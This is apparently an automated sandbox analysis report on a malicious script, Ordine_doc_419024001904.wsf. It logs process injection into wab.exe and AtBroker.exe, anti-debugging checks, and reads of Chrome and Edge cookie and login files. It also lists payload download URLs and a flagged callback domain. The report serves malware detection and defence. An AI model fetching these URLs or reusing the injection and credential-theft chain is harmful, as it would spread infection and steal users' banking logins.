Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6192	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: s5497I81.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: s5497I81.12.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: s5497I81.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wab.exe, 00000009.00000003.2592625920.0000000004B78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687613635.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687613635.0000000004B78000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3229883685.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: s5497I81.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: powershell.exe, 00000005.00000002.2397711658.0000000006F9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllol
Source: AtBroker.exe, 0000000C.00000002.3230765506.0000000008440000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: use_dateINTEGERmVMware
Source: s5497I81.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: wab.exe, 00000009.00000002.2687527805.0000000004B42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: s5497I81.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: s5497I81.12.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AtBroker.exe, 0000000C.00000002.3230765506.0000000008440000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mVMware
Source: s5497I81.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: powershell.exe, 00000002.00000002.2542707682.000001AE488B0000.00000004.00000020.00020000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000002.3228024968.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AtBroker.exe, 0000000C.00000002.3229883685.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWWNlkeXXqdqVYiV1NR2TknteJ8gPHFSuvG47YGycsFNK3obzig==&
Source: firefox.exe, 00000011.00000002.2993337503.0000026AE7D4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee
Source: s5497I81.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: s5497I81.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: s5497I81.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: s5497I81.12.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: s5497I81.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: s5497I81.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: s5497I81.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: s5497I81.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: wscript.exe, 00000000.00000003.1998427130.0000015274974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nk Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27859GameDVR and Broadcast User Service_27859Bluetooth User Support Service_27859CaptureService_27859Clipboard User Service_27859Connected Devices Platform User Service_27859ConsentUX_27859CredentialEnrollmentManagerUserSvc_27859DeviceAssociationBroker_27859DevicePicker_27859DevicesFlow_27859MessagingService_27859Sync Host_27859Contact Data_27859PrintWorkflow_27859Udk User Service_27859gupd
Source: s5497I81.12.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: s5497I81.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: s5497I81.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtUnmapViewOfSection: Direct from: 0x76EF2D3C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E90000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E7FC70			Jump to behavior

Source: VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000000.2608050850.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227730413.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756760533.0000000001411000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000000.2608050850.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227730413.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756760533.0000000001411000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000000.2608050850.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227730413.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756760533.0000000001411000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000000.2608050850.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227730413.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756760533.0000000001411000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.121.105.163	unknown	Bulgaria		43561	NET1-ASBG	false
47.91.88.207	www.tyaer.com	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Windows Analysis Report Ordine_doc_419024001904.wsf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Ordine_doc_419024001904.wsf

Malware Threat Intel
Provided by

Name	IP	Active
www.oyoing.com	127.0.0.1	true
www.tyaer.com	47.91.88.207	true
www.megabet303.lol	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://87.121.105.163/Acariatre43.chm	false	18%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tyaer.com/gnbc/?URw=Rnl4c&BP-t5v1=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==	true	Avira URL Cloud: malware	unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin	false	17%, Virustotal, Browse Avira URL Cloud: safe	unknown

ID:	1431462
Product:	CloudBasic
Start time:	08:11:05
Start date:	25.04.2024
Sample:	Ordine_doc_419024001904.wsf
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
